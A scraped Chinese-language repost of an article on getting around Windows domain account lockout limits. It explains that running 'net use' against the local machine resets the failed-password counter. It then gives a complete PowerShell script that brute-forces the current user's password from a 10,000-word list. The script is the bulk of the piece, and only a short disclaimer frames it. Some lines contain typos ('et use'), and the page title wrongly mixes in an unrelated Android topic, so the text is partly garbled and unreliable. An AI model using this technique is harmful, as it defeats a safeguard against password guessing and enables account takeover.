android域账号认证失败,绕过域账户认证失败锁定次数限制的技巧
原標(biāo)題:繞過域賬戶認(rèn)證失敗鎖定次數(shù)限制的技巧
*本文僅用于教育目的。 切勿在未授權(quán)的計(jì)算機(jī)上進(jìn)行安全測試。
獲取用戶帳戶密碼有很多好方法,這只是另一種方式。 好的,讓我們開始吧。核心思路是,用戶想要爆破身份驗(yàn)證,他們就可以運(yùn)行“net use \\%computername%/ u:%username%”命令,該命令可以重新要求身份驗(yàn)證并重置鎖定計(jì)數(shù)。要想進(jìn)行操作,您需要從Microsoft下載遠(yuǎn)程服務(wù)器管理工具安裝該工具后,運(yùn)行一小段powershell腳本以顯示我的JoeUser帳戶信息并鎖定。
get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto
在我的本地策略中,您可以看到我在3次無效登錄嘗試后被鎖定(我從Microsoft獲得的默認(rèn)安裝值)。
接下來我將輸入錯(cuò)誤的密碼,window將記錄我的錯(cuò)誤次數(shù)。
現(xiàn)在我將使用命令清除錯(cuò)誤的密碼嘗試:“Net use \\%computername%/ u:%username%”注意我沒有指定密碼。 我已經(jīng)以用戶身份登錄,它似乎使用當(dāng)前用戶的上下文進(jìn)行身份驗(yàn)證,并清除了錯(cuò)誤的密碼計(jì)數(shù)!
現(xiàn)在我可以使用這種技術(shù)爆破密碼。 唯一的缺點(diǎn)是我必須在每次設(shè)置后刪除共享。 例如,現(xiàn)在我已經(jīng)進(jìn)行了共享設(shè)置,如果我嘗試爆破密碼,我會收到此消息
然而只需一條命令即可“Net Use /Delete \\%computername%”
正式測試,我使用Daniel Miesslers SecLists的前10000名密碼列表來爆破。正確的密碼也在里面。
$userVar = Get-ChildItem env:username $uname = $userVar.Value $computerVar = Get-ChildItem env:computername $computerName = $computerVar.Value $ErrorActionPreference = "Stop" $hooray = "PasswordNotFoun" $CurrentPath = "C:\Users\Public" $FileName = "10-million-password-list-top-10000.txt" $FName= "$CurrentPath\$FileName" foreach($value in [System.IO.File]::ReadLines($Fname)) { $passAttempt = ('net use \\' + $computerName + ' "' + $value + '"' + '/u:' + $uname ) try { Write-Output ("trying password " + $value) $output = Invoke-Expression $passAttempt | Out-Null $hooray = $value write-output ("FOUND the user password: " + $value) $reset = ('et use \\' + $computername + ' /u:'+ $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('net use /delete \\' + $computername ) Invoke-Expression $deleteShare | Out-Null break } catch { $reset = ('et use \\' + $computername + '/u:' + $uname ) Invoke-Expression $reset | Out-Null $deleteShare = ('et use /delete \\'+ $computername ) Invoke-Expression $deleteShare | Out-Null } } write-host "The Password is: "$hooray
成功爆破
*參考來源:medium,FB小編周大濤編譯,轉(zhuǎn)載請注明來自FreeBuf.COM 返回搜狐,查看更多
責(zé)任編輯:
總結(jié)
以上是生活随笔為你收集整理的android域账号认证失败,绕过域账户认证失败锁定次数限制的技巧的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 2023 胡润全球富豪榜:LV 老板阿诺
- 下一篇: android 圆环温度控件,andro